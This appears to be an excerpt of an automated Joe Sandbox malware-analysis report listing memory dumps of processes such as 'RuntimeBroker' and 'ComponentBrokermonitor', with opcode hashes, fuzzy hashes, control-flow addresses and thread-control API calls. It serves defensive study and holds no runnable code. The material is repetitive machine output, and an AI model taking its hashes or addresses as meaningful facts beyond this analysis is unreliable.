                                                                                                    • Instruction Fuzzy Hash: 58112931A0F29D8FE722ABA4C8202F97B70EF42710F0546B7D454DB1E3CA782609CB55
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1d045487ee9bc2e0991d4d9adbcf9e233bc11e5c319a86de3a18e473568bb48a
                                                                                                    • Instruction ID: ce73e6b451ff9534d0bd293596763689a0d66f8f05a81aae7a7d2433e9977792
                                                                                                    • Opcode Fuzzy Hash: 1d045487ee9bc2e0991d4d9adbcf9e233bc11e5c319a86de3a18e473568bb48a
                                                                                                    • Instruction Fuzzy Hash: 8E115A3166924D8FCF44EF6CC8919EAB7A0FF59308F0102AAE84DD3251C730A564CB81
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e864652300de8a606cf3d5965fc07d723ba137fc0988361cd5264102c2a6e98d
                                                                                                    • Instruction ID: 6a215bf8e23418979dd23d3ebbb43f790c0d0ac0da9d9eef289a17ad06aea3bf
                                                                                                    • Opcode Fuzzy Hash: e864652300de8a606cf3d5965fc07d723ba137fc0988361cd5264102c2a6e98d
                                                                                                    • Instruction Fuzzy Hash: C321A570D4966D8AEBB4EB54C8A83FCB6B1EB54301F5141E9D00DA32A1CFB86AC4DF04
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ce5f3ccf6c4bb4cf984d73f5f9e6b44ec4f2551333d61ba1aec5c45719ced4fc
                                                                                                    • Instruction ID: 1142e0ca36ac30720468f01ca25efb6f178bd565f1ddb7411e106cf91a9ef1c7
                                                                                                    • Opcode Fuzzy Hash: ce5f3ccf6c4bb4cf984d73f5f9e6b44ec4f2551333d61ba1aec5c45719ced4fc
                                                                                                    • Instruction Fuzzy Hash: C701D270E0E28E8FE722ABA4C8202F97B70EF02710F0546B7D454DB1E3CA782604C745
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 94282658873c2b30c05acde5b02b01038a2811cfc96288bffa2fb6283bd7ad9e
                                                                                                    • Instruction ID: 5bfa1054adfb64e8bac8686046fc9076c683c6dcc925602b6581b70bae9a2ddc
                                                                                                    • Opcode Fuzzy Hash: 94282658873c2b30c05acde5b02b01038a2811cfc96288bffa2fb6283bd7ad9e
                                                                                                    • Instruction Fuzzy Hash: 9DF03030A05A4E9FEB60FF98D4596FD77A0FFA4304F510536E41CC21A0DAB462908B84
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 17a53e886d47b573aad22c58ff1dec0b63c156184a310712d5ca5b0d5fb60cb4
                                                                                                    • Instruction ID: 4a0d16f89504b55a2c8cd88e9d022537469c0e4a31469c3e9e669b08f77a280d
                                                                                                    • Opcode Fuzzy Hash: 17a53e886d47b573aad22c58ff1dec0b63c156184a310712d5ca5b0d5fb60cb4
                                                                                                    • Instruction Fuzzy Hash: 6AF0BD30A1494D9FDF94EF68C459AAE7BE0FF68304F014565F81CC3261DA30E590CB80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1785340995.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bc60000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1784067251.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_7ffd9bac0000_ComponentBrokermonitor.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                                    • API String ID: 0-1692736845

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:4%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:0%
                                                                                                    Total number of Nodes:12
                                                                                                    Total number of Limit Nodes:0
                                                                                                    execution_graph
                                                                                                    19090 7ffd9bc7d700 19091 7ffd9bc7d706 ResumeThread 19090->19091 19093 7ffd9bc7d814 19091->19093
                                                                                                    19086 7ffd9bc7c00d 19087 7ffd9bc7c01b SuspendThread 19086->19087 19089 7ffd9bc7c0f4 19087->19089
                                                                                                    19082 7ffd9bc7d869 19083 7ffd9bc7d877 CloseHandle 19082->19083 19085 7ffd9bc7d954 19083->19085
                                                                                                    19078 7ffd9bc7f4c5 19079 7ffd9bc7f4df GetFileAttributesW 19078->19079 19081 7ffd9bc7f5a5 19079->19081

                                                                                                    Control-flow Graph

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: gbu
                                                                                                    • API String ID: 0-1863516185

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 221 7ffd9bad0d74-7ffd9bad0d87 222 7ffd9bad0d89 221->222 223 7ffd9bad0d8a-7ffd9bad0dc9 221->223 222->223 225 7ffd9bad0dcb 223->225 226 7ffd9bad0dd0-7ffd9bad0e39 call 7ffd9bad07d0 223->226 225->226 235 7ffd9bad0e3b-7ffd9bad0e6d 226->235 236 7ffd9bad0e70-7ffd9bad0ebb 226->236 235->236 243 7ffd9bad0ed3-7ffd9bad0fb3 236->243 244 7ffd9bad0ebd-7ffd9bad0ed2 236->244 256 7ffd9bad0fbb-7ffd9bad10ac 243->256 244->243
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2910129645.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bc70000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ResumeThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 947044025-0

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 12 7ffd9bc7c00d-7ffd9bc7c019 13 7ffd9bc7c024-7ffd9bc7c0f2 SuspendThread 12->13 14 7ffd9bc7c01b-7ffd9bc7c023 12->14 18 7ffd9bc7c0f4 13->18 19 7ffd9bc7c0fa-7ffd9bc7c144 13->19 14->13 18->19
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2910129645.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bc70000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: SuspendThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 3178671153-0

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 22 7ffd9bc7f4c5-7ffd9bc7f5a3 GetFileAttributesW 26 7ffd9bc7f5ab-7ffd9bc7f5e9 22->26 27 7ffd9bc7f5a5 22->27 27->26
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2910129645.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bc70000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 85 7ffd9bc7d869-7ffd9bc7d875 86 7ffd9bc7d880-7ffd9bc7d952 CloseHandle 85->86 87 7ffd9bc7d877-7ffd9bc7d87f 85->87 91 7ffd9bc7d954 86->91 92 7ffd9bc7d95a-7ffd9bc7d9ae 86->92 87->86 91->92
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2910129645.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bc70000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2962429428-0

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 393 7ffd9c1b1568-7ffd9c1b1570 395 7ffd9c1b14f8-7ffd9c1b14fd 393->395 396 7ffd9c1b1572-7ffd9c1b42fa 393->396 395->393 399 7ffd9c1b42fc 396->399 400 7ffd9c1b4301-7ffd9c1b4315 396->400 399->400 403 7ffd9c1b4317-7ffd9c1b432e 400->403 404 7ffd9c1b4332-7ffd9c1b44fd 400->404 403->404 421 7ffd9c1b4508-7ffd9c1b4514 404->421 422 7ffd9c1b451b-7ffd9c1b453a 421->422 423 7ffd9c1b453c-7ffd9c1b4541 422->423 424 7ffd9c1b4543-7ffd9c1b4547 422->424 423->424 425 7ffd9c1b454b-7ffd9c1b454c 424->425 426 7ffd9c1b4549 424->426 427 7ffd9c1b454e-7ffd9c1b455a 425->427 426->427
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 429 7ffd9bad08d0-7ffd9bad08d9 431 7ffd9bad08db-7ffd9bad08e6 429->431 432 7ffd9bad0916-7ffd9bad0949 429->432 431->432 435 7ffd9bad094b-7ffd9bad095f 432->435 436 7ffd9bad0986-7ffd9bad098f 432->436
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a0b4602f576bff30e6e660a460a968b290e393ce1fd861ac6f6517ee10c44bbe
                                                                                                    • Instruction ID: fb100260e5bfadc43a62fb50df5c0790193c14904ed4c6bc5b4eb5978752b773
                                                                                                    • Opcode Fuzzy Hash: a0b4602f576bff30e6e660a460a968b290e393ce1fd861ac6f6517ee10c44bbe
                                                                                                    • Instruction Fuzzy Hash: AF516C30A0890E9FCF84EF98D494EEDBBF1FF58325B150169E419E7260DA74E990CB90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6bafc0bb267ad5a5b12680f8dffdbf68e83b105d832a2c2816f65c6ab1f59523
                                                                                                    • Instruction ID: af5894670fa649cc8bb08ce1e8615a84024a5276c4b2e74e9b9f98e519f81048
                                                                                                    • Opcode Fuzzy Hash: 6bafc0bb267ad5a5b12680f8dffdbf68e83b105d832a2c2816f65c6ab1f59523
                                                                                                    • Instruction Fuzzy Hash: BB412775E0875C8FEB54DFA8C899AEDBBF0FB5A310F10416AD009EB256DB34A845CB40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fa51981defc0408234bd48207e9bcd0b112d2a6e6ff21c8e569e1048be917142
                                                                                                    • Instruction ID: 65bbba0a53668e1642fd34d461aadaafad0ee09505df799d9dc25afa5e3632cb
                                                                                                    • Opcode Fuzzy Hash: fa51981defc0408234bd48207e9bcd0b112d2a6e6ff21c8e569e1048be917142
                                                                                                    • Instruction Fuzzy Hash: 8E415931E0824A8FEB24DF94C8947ADBBB1FB55355F10027AC009AB6D5CB796886CF44
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ca6535a770e3c009165f9af2a165f59ce30f56bb7ca16e696e23535fb26f0fa9
                                                                                                    • Instruction ID: 3080dc181e9d557486c54a6cbfc5c4c2811b012db1becb91491fc0e285d52097
                                                                                                    • Opcode Fuzzy Hash: ca6535a770e3c009165f9af2a165f59ce30f56bb7ca16e696e23535fb26f0fa9
                                                                                                    • Instruction Fuzzy Hash: E1413B70A1495D8FDF94EF98C895AEDB7F1FF58310F010169E409E32A5CB34A981CB80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: edfc8e4afb27f100fee6a009399c91c4d79b1881957ab0c206bc782529b92e5d
                                                                                                    • Instruction ID: 66a226d7319011dfbbc577807dff7ec4465d8444e60e2a6358390512a09fac51
                                                                                                    • Opcode Fuzzy Hash: edfc8e4afb27f100fee6a009399c91c4d79b1881957ab0c206bc782529b92e5d
                                                                                                    • Instruction Fuzzy Hash: 9441FC30A0951D8EDBA4DB14C865EED77B5EF99311F5002EAD00EE72A1CE746A85CF41
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 41d069a51dc52a43caca3a63aa1e705b8e8de4881f618dc149580292a2fe3e41
                                                                                                    • Instruction ID: 5e0e6011d0d91da8e204a4e592fd2e64681f2245fa6fef2962ff2c1c51b6935a
                                                                                                    • Opcode Fuzzy Hash: 41d069a51dc52a43caca3a63aa1e705b8e8de4881f618dc149580292a2fe3e41
                                                                                                    • Instruction Fuzzy Hash: D331C471E0864F8FDB64DFA4C8646EE7BB1EF55340F14417AD00AF72DACA3468448B98
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fb21450b8737124033c7830fb6978a31583074866f198343c7b4bbec6043cb45
                                                                                                    • Instruction ID: 2fa809c59cf663e88dc8078ce99cac63f5ecbc3647b482f5b7e8169c7f6a94d0
                                                                                                    • Opcode Fuzzy Hash: fb21450b8737124033c7830fb6978a31583074866f198343c7b4bbec6043cb45
                                                                                                    • Instruction Fuzzy Hash: A841DC71E4952D8EEBA4DB54C8947ECB7F0EF95300F5042EAD04DA62A1DE782AC1CF01
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 07fb815b34a6e205a4e9d854b746d6338e9d2638ceb60b4f5893b8f8130b805c
                                                                                                    • Instruction ID: ad7b9d6ae530018bbe48a5d34bd459b23c967b5d8e160f9e32e23803d69ef858
                                                                                                    • Opcode Fuzzy Hash: 07fb815b34a6e205a4e9d854b746d6338e9d2638ceb60b4f5893b8f8130b805c
                                                                                                    • Instruction Fuzzy Hash: CD212B75B0E28D4FE73297A8CC312ED3B60EF82711F460677C1549A1F2C6782605C795
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 90295c93d3adbc4ae146486ebe8cbf1a56d31f604b33ef235a436b8cab751047
                                                                                                    • Instruction ID: e7c1a0bdc83450ecd47e0c7ffcea00cbae7ec14ae9c965e92ad5101aa1fb236f
                                                                                                    • Opcode Fuzzy Hash: 90295c93d3adbc4ae146486ebe8cbf1a56d31f604b33ef235a436b8cab751047
                                                                                                    • Instruction Fuzzy Hash: BB21DA30A1591D8FDB94EFA8C8A89EDB7F1FF68304F11066AE40DD72A5DB74A941CB40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c480f58f9738fa7d4f0e07d1728cc4485ba6981c215613260a4a07970d1eef21
                                                                                                    • Instruction ID: 03993e246991828c405ccd3f2833fd8b3c9775269788def040f0072a9108bc61
                                                                                                    • Opcode Fuzzy Hash: c480f58f9738fa7d4f0e07d1728cc4485ba6981c215613260a4a07970d1eef21
                                                                                                    • Instruction Fuzzy Hash: B711BC35908A4D8FCF90EF64D844AEABBB0FB65314F0001AAE40CC71A1DB35DA95CB80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bb300db6e0f1408a5b4a575d6c17402eec268382485db0d7bdc576a2515a4d2f
                                                                                                    • Instruction ID: dcafc1128504d2f13c27fdc8f9139ea3ba88a868fddacfe9f09b49a9bdedf04a
                                                                                                    • Opcode Fuzzy Hash: bb300db6e0f1408a5b4a575d6c17402eec268382485db0d7bdc576a2515a4d2f
                                                                                                    • Instruction Fuzzy Hash: 8C119E31918A0ECFDF94EF98C898ABABBF0FF14309F0005AAD459D7595CB31A590CB85
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8057bef169d04579055e62e005c61f8ac81768673dfbe3d7ab5ddefb7d8a8a40
                                                                                                    • Instruction ID: 9eb1b65494dff80a7bbd6d63029d5a7379afd607d4efccad4eaa987b8e53a7b4
                                                                                                    • Opcode Fuzzy Hash: 8057bef169d04579055e62e005c61f8ac81768673dfbe3d7ab5ddefb7d8a8a40
                                                                                                    • Instruction Fuzzy Hash: 72110631A0E28D8FE7229BA4C8302E97B70EF82711F0546B7D054DB1F2CA782609C755
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 94b4803ddde2861bfd66f1334b0d07634582d3cb1091bfa91bb28895e57d0683
                                                                                                    • Instruction ID: d0ac2eeeb9725b62b36e593902657f2ab7637373a803305c4d7bbd14489bb3a8
                                                                                                    • Opcode Fuzzy Hash: 94b4803ddde2861bfd66f1334b0d07634582d3cb1091bfa91bb28895e57d0683
                                                                                                    • Instruction Fuzzy Hash: 8811C23054868D8FCB46DF64C865AE97FB0EF16314F0400D7E448C70A2C6399596CB51
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3e2477a5948ae63070daa9fd3b373e441ddfa20f73f3aaf81f5d4b68bb728b21
                                                                                                    • Instruction ID: b5af68458b3cb44e247bd72c17dcddc1fb0478ab39eb262f0aa64723753ab1cd
                                                                                                    • Opcode Fuzzy Hash: 3e2477a5948ae63070daa9fd3b373e441ddfa20f73f3aaf81f5d4b68bb728b21
                                                                                                    • Instruction Fuzzy Hash: 8C115A3166924D8FCF44EF6CD8919EAB7A0FF59308F0102AAE84DD3251C730A564CB81
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1b27e7f6130fa4f4d4bad62c3c2cf70cc75528e7280cae3ca6be3109107bc88b
                                                                                                    • Instruction ID: c901f46c21f449b00caa157518a5d975a1a040929b992a543a483ad13c5d2dca
                                                                                                    • Opcode Fuzzy Hash: 1b27e7f6130fa4f4d4bad62c3c2cf70cc75528e7280cae3ca6be3109107bc88b
                                                                                                    • Instruction Fuzzy Hash: 4E110831E0C54B8FEB54EBD8C4646ECB3B1EF54360F44827AC408E6199D938A4428B44
                                                                                                    Memory Dump Source
